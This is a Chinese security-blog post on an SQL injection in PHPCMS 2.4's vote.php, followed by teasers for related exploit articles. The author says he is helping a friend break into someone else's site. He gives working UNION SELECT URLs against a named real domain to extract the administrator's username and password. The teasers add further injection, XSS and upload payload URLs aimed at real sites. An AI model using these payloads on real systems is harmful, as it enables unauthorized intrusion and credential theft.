PHPCMS2.4中一个有趣的洞洞
所属分类:
网络安全 / 漏洞分析
阅读数:
92
收藏 0赞 0分享
今天,朋友丢来一个站,说想拿点资料,但搞了很久老搞不下,叫我帮忙看看
打开一看发现是phpcms2.4,很旧的版本了~~
搞了一下发现存在“上传漏洞”和“远程文件包含漏洞”的页面都被删了,晕,自己挖个把,反正版本旧
挖了1个多小时,发现vote.php中有这样一段代码:
...省略....
case 'result':
if(!intval($voteid)){
message('参数错误!',$PHP_REFERER);
}
$query = $db->query("SELECT * FROM $table_vote_subject where voteid='$voteid' and passed=1");
$vote=$db->fetch_array($query);
$subject=$vote[subject];
$totalnumber=$vote[totalnumber];
$fromdate=date("Y-m-d",$vote[fromtime]);
$todate=$vote[totime] ? date("Y-m-d",$vote[totime]) : "";
$query = $db->query("SELECT * FROM $table_vote_option where voteid='$voteid'");
while($op=$db->fetch_array($query)){
$op[percent1]=$totalnumber ? round(100*$op[number]/$vote[totalnumber],2)."%" : "0%";
$op[percent2]=$totalnumber ? (100-round(100*$op[number]/$vote[totalnumber],0))."%" : "100%";
$ops[]=$op;
}
include template('vote_result');
break;
}
....省略....
代码没问题把?真的吗?再仔细看看!!
“if(!intval($voteid))” 这句代码的意思是啥?
如果提交过来的数据是整型并且不存在于数据库中的话,就返回“参数错误”。
那如果我们提交的数据不是整型呢?如果我们提交的数据不是整型,那么不管提交的数据是否存在于数据库中都不会返回“参数错误”的提示了,这样,注入漏洞就产生了~~哈哈
分别提交
“http://www.cndrt.cn/vote.php?action=result&;voteid=8 and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13 from phpcms_member where userid=1/*””
“http://www.cndrt.cn/vote.php?action=result&;voteid=8 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from phpcms_member where userid=1/*””
就能查出管理员了
当然你也可以用concat()把账号密码同时抓出来~
.Net开发人员常犯的6大安全错误
微软已经为.Net环境添加了大量的功能,帮助开发人员创建安全的应用程序,例如,身份验证已经成为开发环境集成的一个功能,另外,默认情况下调试消息被禁用掉了。微软对安全的关注程度极大地影响了开发人员,促使他们在软件开发过程中重新评估纳入安全保障的重要性。
收藏 0赞 0分享
科汛 KesionCMS 文件名解析漏洞
科汛cms,eshop系统建站第一品牌.专业提供开源cms项目定制服务及名片系统,在线输出,在线印刷,广告制作,在线图文下单系统提供商。
收藏 0赞 0分享
科讯 kesioncms 5.5以下漏洞拿shell方法原理总结(图文)
科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增大了拿shell 的难度。下面就个版本拿shell 的方法做一总结。
收藏 0赞 0分享
织梦网官方(dedecms)爆路径最新漏洞
首发:红科网安 作者:Amxking 漏洞程序:dedecms5.5 测试对象:织梦网CMS官方网站 提交时间:2010-03-17 漏洞类型:信息泄露 危险等级:低 漏洞描述: dedecms 5.5程序泄露网站路径信息。 测试地址:
收藏 0赞 0分享
ewebeditor通杀鸡肋0day漏洞
先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码
收藏 0赞 0分享
PHP漏洞全解
PHP网页的安全性问题,针对PHP的网站主要存在下面几种攻击方式
收藏 0赞 0分享
ecshop爆绝对路径的bug
ecshop爆绝对路径的bug 网址如下" http://www.zzfhw.com/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/s
收藏 0赞 0分享
dedecms织梦 v5.5 两处跨站漏洞
影响版本: dedecms织梦5.5 漏洞描述: demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&
收藏 0赞 0分享
dedecms 5.6的最新注入漏洞
最新dedecms 5.6的注入代码:
http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28
收藏 0赞 0分享
查看更多